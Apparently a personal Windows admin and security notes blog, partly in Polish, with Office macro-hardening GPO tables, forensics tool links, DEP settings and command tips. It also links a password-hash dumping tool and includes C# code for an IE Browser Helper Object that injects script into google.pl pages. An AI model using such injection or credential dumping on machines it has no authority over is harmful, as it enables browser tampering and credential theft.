        ( '328192', 'Enabled, Smartcard Required, Password Doesn''t Expire' ),
        ( '328194', 'Disabled, Smartcard Required, Password Doesn''t Expire' ),
        ( '328224',
          'Enabled, Smartcard Required, Password Doesn''t Expire & Not Required' ),
        ( '328226',
          'Disabled, Smartcard Required, Password Doesn''t Expire & Not Required' )
Kategorie Windows

The Software Update Checker

find vulnaraility software | 9 June 2017
  • FileHippo AppManager

  • Secunia Personal Software Inspector (PSI)

  • Software Update Monitor (SUMo)

Command Line Kung Fu

14 March 2017

source: http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html

Auditing

The Advantage of "sort" to View Passwords
Avoiding LANMAN False Positives
"chage" to Get/Set Password Security Parameters
Change a User's Password to Blank
Find Accounts With Superuser Privileges
Finding Duplicate User IDs
Finding Null Passwords
Lock Out Users Remotely While Preserving Session
Lock Screen With "tsdiscon"
"net use" and The Blank Passwords
Show Account Security Settings
Show Domain-Wide Settings For Accounts
Suspicious Password Entries
Why "wmic" Remote Lock Fails?
"wmic" to Display Users' SID
Workaround to View Windows Password Hashes


Forensics

Better "find" with touch
Determine where a USB device was plugged into
Display File Creation Time
Listing Files by Inode as a Proxy for Creation Time
Remotely Pull USB info
Show USB vendor/serial number 
USB History
Watch File Count in a Directory

Network Troubleshooting

Hack to Pull Out a Specific Protocol From "netstat" Output (Linux)
Kill Process by TCP/UDP port number
Learn About Network Traffic
"netstat" vs "lsof"
Protocol Stats
"watch" vs "netstat -c" 

Penetration Testing

The Broadcast Ping
Command-Line Ping Sweeper
Detecting when a scan reaches a given target
Firewall Chains
Look at Firewall Configs
Reverse DNS Records
See the Number of Times a Firewall Rule Was Triggered
Show Ports Allowed Through Firewall
Show Programs Allowed Through Firewall
Speed Up Ping


System Administration


Aborting a System Shutdown
Browsing the Registry with Powershell  
Careful with iptables "INPUT"
Converting Unix timestamps to human-readable form 
Disable The Guest Account 
Dropping Firewall Dead
Execute a Command En Mass
"find ...| xargs ..." vs "find ... -exec ..."
"findstr /m" to Print Only File Name
Find Files That Only Contain Printable ASCII With "findstr /p" (But be Aware)
Finding Names of Files Matching a String
Having Fun with Firewall
The Importance of Putting Your System's Hostname
IPTables or The Simplified Firewall Configuration
Linking Files
Listing Files and Their Sizes
Listing the largest 100 files
Poke Holes Through The Firewall
Reboot in [N] Seconds
Remote Command Execution
Simplify Your Life With "ufw"
SSH: Using "user@host" vs "-l" 
Symlink to an Entire Directory
What is hogging up the space?
WScript to Create Link For Files and Folders

Text Manipulation

Backup Before You Change With "sed"
Build Your Own "uniq" Command on Windows
Convert Multiple-Line Output into a Single Line Using "tr"
Convert Text Formats - Dos to Unix
Extra Little File to Help
"for" loops to parse text
Have "sed" Use Extended Regular Expressions
Replacing Strings in Multiple Files
Replacing Text Powershell Way
The Single Quote, The Double Quote, and The "FOR" Loop
When "sed" is better than "awk"

 

Analiza Windows Active Directory

11 November 2016
https://gallery.technet.microsoft.com/Active-Directory-Audit-7754a877#!

CIS o windows 7

2 November 2016

Security Configuration Benchmark For

Version 1.1.0
July 30th 2010
Microsoft Windows 7

https://benchmarks.cisecurity.org/tools2/windows/CIS_Microsoft_Windows_7_Benchmark_v1.1.0.pdf

ABW o windows

18 September 2016

Secure Coding Guidelines

13 March 2016

IIS - URLScan - protect IIS

13 March 2016
Kategorie Tools, Windows

Windows GPO local and doman for office 2013

8 March 2016

Admnistratve templates: 

32-bytes (11,2 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_32bit.exe
64-bytes (11,4 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_64bit.exe

extract and find admx files

local station:

  • .admx  move to C:\Windows\PolicyDefinitions
  • .adml move to C:\Windows\PolicyDefinitions\en-US

domain controler

  • .admx  move to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions
  • .adml move to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions\en-US

Run gpedit.msc

MOST important setting

GPO
value
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
Trust Access to Visual Basic Project
Disabled
VBA Macro Notification Settings
Enabled
 
Disable all without notification
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
Automation Security
Enabled
 
Set the Automation Security Level: Use application macro security level
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
Allow mix of policy and user locations
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Outlook 2013\Security\Trust Center
Apply macro security settings to macros, add-ins and additional actions
Enabled
 
Security setting for macros
Enabled
 
Security Level: Never warn, disable all
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
Trust Access to Visual Basic Project
Disabled
VBA Macro Notification Settings
Enabled
 
Disable all without notification
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
Trust Access to Visual Basic Project
Disabled
VBA Macro Notification Settings
Enabled
 
Disable all without notification
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled

 

Medium important setting

GPO
value
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
Turn off trusted documents
Enabled
Turn off Trusted Documents on the network
Enabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
Turn off trusted documents
Enabled
Turn off Trusted Documents on the network
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
Turn off trusted documents
Enabled
Turn off Trusted Documents on the network
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
Disable all application add-ins
Enabled
Disable Trust Bar Notification for unsigned application add-ins and block them
Not configured
Require that application add-ins are signed by Trusted Publisher
Not configured
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
Allow mix of policy and user locations
Disabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
Disable all application add-ins
Enabled
Disable Trust Bar Notification for unsigned application add-ins and block them
Not configured
Require that application add-ins are signed by Trusted Publisher
Not configured
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\ PowerPoint Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
Disable all application add-ins
Enabled
Disable Trust Bar Notification for unsigned application add-ins and block them
Not configured
Require that application add-ins are signed by Trusted Publisher
Not configured
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\ Word Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
Disable All ActiveX
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
Turn off file validation
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
Turn off error reporting for files that fail file validation
Enabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
Turn off file validation
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
Turn off file validation
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Protected View
Do not open files from the Internet Zone in Protected View
Disabled
Do not open files in unsafe locations in Protected View
Disabled
Set document behaviour if file validation fails
Enabled
 
Block files completely
Turn off Protected View for attachments opened from Outlook
Disabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Protected View
Do not open files from the Internet Zone in Protected View
Disabled
Do not open files in unsafe locations in Protected View
Disabled
Set document behaviour if file validation fails
Enabled
 
Block files completely
Turn off Protected View for attachments opened from Outlook
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Protected View
Do not open files from the Internet Zone in Protected View
Disabled
Do not open files in unsafe locations in Protected View
Disabled
Set document behaviour if file validation fails
Enabled
 
Block files completely
Turn off Protected View for attachments opened from Outlook
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
Force file extension to match file type
Enabled
 
Always match file type
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
Force file extension to match file type
Enabled
 
Always match file type
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
Force file extension to match file type
Enabled
 
Always match file type
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\File Block Settings
dBase III / IV files
Enabled
 
File block setting: Block
Dif and Sylk files
Enabled
 
File block setting: Block
Excel 2 macrosheets and add-in files
Enabled
 
File block setting: Block
Excel 2 worksheets
Enabled
 
File block setting: Block
Excel 2007 and later add-in files
Enabled
 
File block setting: Block
Excel 2007 and later binary workbooks
Enabled
 
File block setting: Block
Excel 2007 and later macro-enabled workbooks and templates
Enabled
 
File block setting: Block
Excel 3 macrosheets and add-in files
Enabled
 
File block setting: Block
Excel 3 worksheets
Enabled
 
File block setting: Block
Excel 4 macrosheets and add-in files
Enabled
 
File block setting: Block
Excel 4 workbooks
Enabled
 
File block setting: Block
Excel 4 worksheets
Enabled
 
File block setting: Block
Excel 95 workbooks
Enabled
 
File block setting: Block
Excel 95-97 workbooks and templates
Enabled
 
File block setting: Block
Excel 97-2003 add-in files
Enabled
 
File block setting: Block
Excel 97-2003 workbooks and templates
Enabled
 
File block setting: Block
Set default file block behavior
Enabled
 
Blocked files are not opened
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\File Block Settings
PowerPoint 97-2003 presentations, shows, templates and add-in files
Enabled
 
File block setting: Block
PowerPoint beta files
Enabled
 
File block setting: Block
Set default file block behavior
Enabled
 
Blocked files are not opened
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\File Block Settings
Set default file block behavior
Enabled
 
Blocked files are not opened
Word 2 and earlier binary documents and templates
Enabled
 
File block setting: Block
Word 2000 binary documents and templates
Enabled
 
File block setting: Block
Word 2003 binary documents and templates
Enabled
 
File block setting: Block
Word 2007 binary and later binary documents and templates
Enabled
 
File block setting: Block
Word 6.0 binary documents and templates
Enabled
 
File block setting: Block
Word 95 binary documents and templates
Enabled
 
File block setting: Block
Word 97 binary documents and templates
Enabled
 
File block setting: Block
Word XP binary documents and templates
Enabled
 
File block setting: Block
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
Make hidden markup visible
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
Make hidden markup visible
Enabled

 

LESS important setting

 

GPO
value
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Privacy\Trust Center
Allow including screenshot with Office Feedback
Disabled
Automatically receive small updates to improve reliability
Disabled
Disable Opt-in Wizard on first run
Enabled
Enable Customer Experience Improvement Program
Disabled
Send Office Feedback
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center\Trusted Catalogs
Allow Unsecure Apps and Catalogs
Disabled

default dll used by powerpoint

4 March 2016

User and Computer Remote AD

19 February 2016
  1. MS tool: http://www.microsoft.com/pl-pl/download/details.aspx?id=7887
  1. Run
 

dism /online /enable-feature /featurename:RemoteServerAdministrationTools

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles-AD

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles-AD-DS

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles-AD-DS-SnapIns

  1. Run: dsa.msc
Kategorie Power Shell, Windows

Protection of system security

3 November 2015

Password dumping opensource

1 September 2015
https://github.com/quarkslab/quarkspwdump
Kategorie Cpp, Windows

mandiant free forensic tools

24 June 2015
Source: https://www.mandiant.com/resources/downloads
  • Redline ®

    Redline® is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.More

  • IOC Editor

    Mandiant's IOC Editor is a free editor for Indicators of Compromise (IOCs).More

  • IOC Finder

    Mandiant's IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).More

  • Memoryze™

    Free memory forensics software designed to help incident responders find evil within live memory. More

  • Memoryze™ for the Mac

    Free memory forensics software designed to help incident responders find evil within live memory. More

  • Highlighter™

    Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files. More

  • Web Historian™

    Web Historian’s capabilities have been consolidated into Mandiant Redline.More

  • Research: PdbXtract™

    PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.More

  • Research: Mandiant ApateDNS™

    Mandiant ApateDNS is a tool for controlling DNS responses though an easy to use graphical user interface (GUI).More

  • Research: Mandiant Heap Inspector™

    Mandiant Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.More

Windows forensic - process running

21 June 2015

Możliwości inwestygacji:

  • Prefetch
  • Shimcache (https://dl.mandiant.com/EE/library/Whitepaper_ShimCacheParser.pdf)
    • projekty:
      • python: https://github.com/mandiant/ShimCacheParser   (https://dl.mandiant.com/EE/library/Whitepaper_ShimCacheParser.pdf)
      • C#: https://github.com/woanware/shimcacheparser
  • MUICache
  • UserAssist

 

Ciekawa prezentacja: https://digital-forensics.sans.org/summit-archives/DFIR_Summit/Johnny-AppCompatCache-the-Ring-of-Malware-Brice-Daniels-and-Mary-Singh.pdf

Przekierowanie tcpdump linux - windows

8 June 2015

Linux

ssh xdalny-linux "tcpdump -s0 -w - 'port 8080'" | wireshark -k -i -

 

windows

 

plink -ssh username@remote-host "tcpdump -s 0 -w - 'port 8080'" | wireshark -i -

 

source: https://kaischroed.wordpress.com/2013/01/28/howto-use-wireshark-over-ssh/

Data Execution Prevention

1 June 2015

Rzadko włączane zabezpieczenie którego celem jest uniemożliwienie wykonywania kodu z segmentu danych.

 

 

DEP można skonfigurować bezpośrednio zmieniając opcje w pliku Boot.ini lub korzystając z zakładki System Panelu Sterowania ewentualnie rejestr:

  1. Przez rejestr:

    wersja 32 bit
    reg.exe add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer" /v "NoDataExecutionPrevention" /t REG_DWORD /d 0 /f
    wersja 64 bit
    reg.exe add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer" /v "NoDataExecutionPrevention" /t REG_DWORD /d 0 /f /reg:64
     
  2. przez ustawienia z GUI:


     
  3. Przez ustawienia w pliku Boot.ini:

    Boot.ini : /noexecute = poziom_bezpieczeństwa, gdzie poziom_bezpieczenstwa zastępujemy jednym z wyrażeń: AlwaysOn, AlwaysOff, OptIn lub OptOut.

    OPTIN: domyślne ustawienie w systemach Windows XP oraz Windows Vista. DEP obejmuje ochroną tylko programy systemu Windows.

    OPTOUT: domyślne ustawienie w systemie Microsoft Windows Server 2003 SP1. DEP obejmuje ochroną wszystkie procesy. W zakładce System Panelu Sterowania można jednak wprowadzić listę programów, których ochrona DEP ma nie obejmować.

    ALWAYSON: Ta opcja włącza pełną ochronę DEP dla systemu. Wszystkie procesy są kontrolowane przez DEP i nie ma możliwości stworzenia wyjątków.

    ALWAYSOFF: Ta opcja powoduje wyłączenie ochrony DEP niezależnie od tego, czy jest wspierana sprzętowo czy nie.

     

 

 

 

 

 

Kategorie Windows

Wstrzykiwanie JavaScript do IE z pomocą BHO

13 May 2015

Wstrzykiwanie kodu JavaScritp można zrobić z użyciem VS express edition

przykładowy kod (projekt typu "Visual C# -> Class Library"):

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using SHDocVw;
using mshtml;
using System.IO;
using Microsoft.Win32;
using System.Runtime.InteropServices; 


namespace FE_JSinjector
{
    [
        ComVisible(true),
        InterfaceType(ComInterfaceType.InterfaceIsIUnknown),
        Guid("FC4801A3-2BA9-11CF-A229-00AA003D7352")
    ]
    public interface IObjectWithSite
    {
        [PreserveSig]
        int SetSite([MarshalAs(UnmanagedType.IUnknown)]object site);
        [PreserveSig]
        int GetSite(ref Guid guid, out IntPtr ppvSite);
    }

    public class BHOInjector : IObjectWithSite
    {
        public const string BHO_REGISTRY_KEY_NAME = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects";

        private WebBrowser webBrowser;
        public int SetSite(object site)
        {
            if (site != null)
            {
                webBrowser = (WebBrowser)site;
                webBrowser.DocumentComplete +=
                  new DWebBrowserEvents2_DocumentCompleteEventHandler(
                  this.OnDocumentComplete);
            }
            else
            {
                webBrowser.DocumentComplete -=
                  new DWebBrowserEvents2_DocumentCompleteEventHandler(
                  this.OnDocumentComplete);
                webBrowser = null;
            }

            return 0;

        }


        public int GetSite(ref Guid guid, out IntPtr ppvSite)
        {
            IntPtr punk = Marshal.GetIUnknownForObject(webBrowser);
            int hr = Marshal.QueryInterface(punk, ref guid, out ppvSite);
            Marshal.Release(punk);
            return hr;
        }

        public void OnDocumentComplete(object pDisp, ref object URL)
        {
            HTMLDocument document = (HTMLDocument)webBrowser.Document;

            if (URL.ToString().Contains("www.google.pl"))
            {
                IHTMLElement head = (IHTMLElement)((IHTMLElementCollection)
                                        document.all.tags("head")).item(null, 0);
                IHTMLScriptElement scriptObject =
                    (IHTMLScriptElement)document.createElement("script");
                scriptObject.type = @"text/javascript";
                scriptObject.text = "\nfunction hidediv(){document.getElementById" +
                                    "('myOwnUniqueId12345').style.visibility = 'hidden';}\n\n";
                ((HTMLHeadElement)head).appendChild((IHTMLDOMNode)scriptObject);

                string div = "<div id=\"myOwnUniqueId12345\" style=\"position:" +
                                "fixed;bottom:0px;right:0px;z-index:9999;width=300px;" +
                                "height=150px;\"> <div style=\"position:relative;" +
                                "float:right;font-size:9px;\"><a " +
                                "href=\"javascript:hidediv();\">close</a></div>" +
                    "My content goes here ...</div>";

                document.body.insertAdjacentHTML("afterBegin", div);
            }
        }
        #region BHO Internal Functions
        [ComRegisterFunction]
        public static void RegisterBHO(Type type)
        {
            RegistryKey registryKey =
            Registry.LocalMachine.OpenSubKey(BHO_REGISTRY_KEY_NAME, true);

            if (registryKey == null)
                registryKey = Registry.LocalMachine.CreateSubKey(BHO_REGISTRY_KEY_NAME);

            string guid = type.GUID.ToString("B");
            RegistryKey ourKey = registryKey.OpenSubKey(guid);

            if (ourKey == null)
                ourKey = registryKey.CreateSubKey(guid);

            ourKey.SetValue("NoExplorer", 1, RegistryValueKind.DWord);

            registryKey.Close();
            ourKey.Close();
        }

        [ComUnregisterFunction]
        public static void UnregisterBHO(Type type)
        {
            RegistryKey registryKey =
            Registry.LocalMachine.OpenSubKey(BHO_REGISTRY_KEY_NAME, true);
            string guid = type.GUID.ToString("B");

            if (registryKey != null)
                registryKey.DeleteSubKey(guid, false);
        }

        #endregion
    }
}

Rejestracja w systemie:

  1. Zaznacz przed kompilacją w VS "Make assembly COM-Visable" (Solution explorer -> Assembly Information... -> na dole popup'a)
  2. Dodaj własność Strong Name (Solution explorer -> Signing -> checkbox: Sign the assembly -> <new...> przejdź czarodzieja)
  3. Skopiuj do katalogu %ProgramFiles%\Internet Explorer\Wtyczki bibliotekę dll
  4. (wersja 32 bit) uruchom RegAsm /codebase na bibliotece z  Framework .Net  np: Windows\Microsoft.NET\Framework\v4.X.XXXX\RegAsm.exe
  5. (wersja 64 bit) uruchom RegAsm /codebase na bibliotece z  Framework .Net  np: Windows\Microsoft.NET\Frameworkx64\v4.X.XXXX\RegAsm.exe
  6. Uruchom w IE plugin

 

 

 

Kategorie CSharp, Windows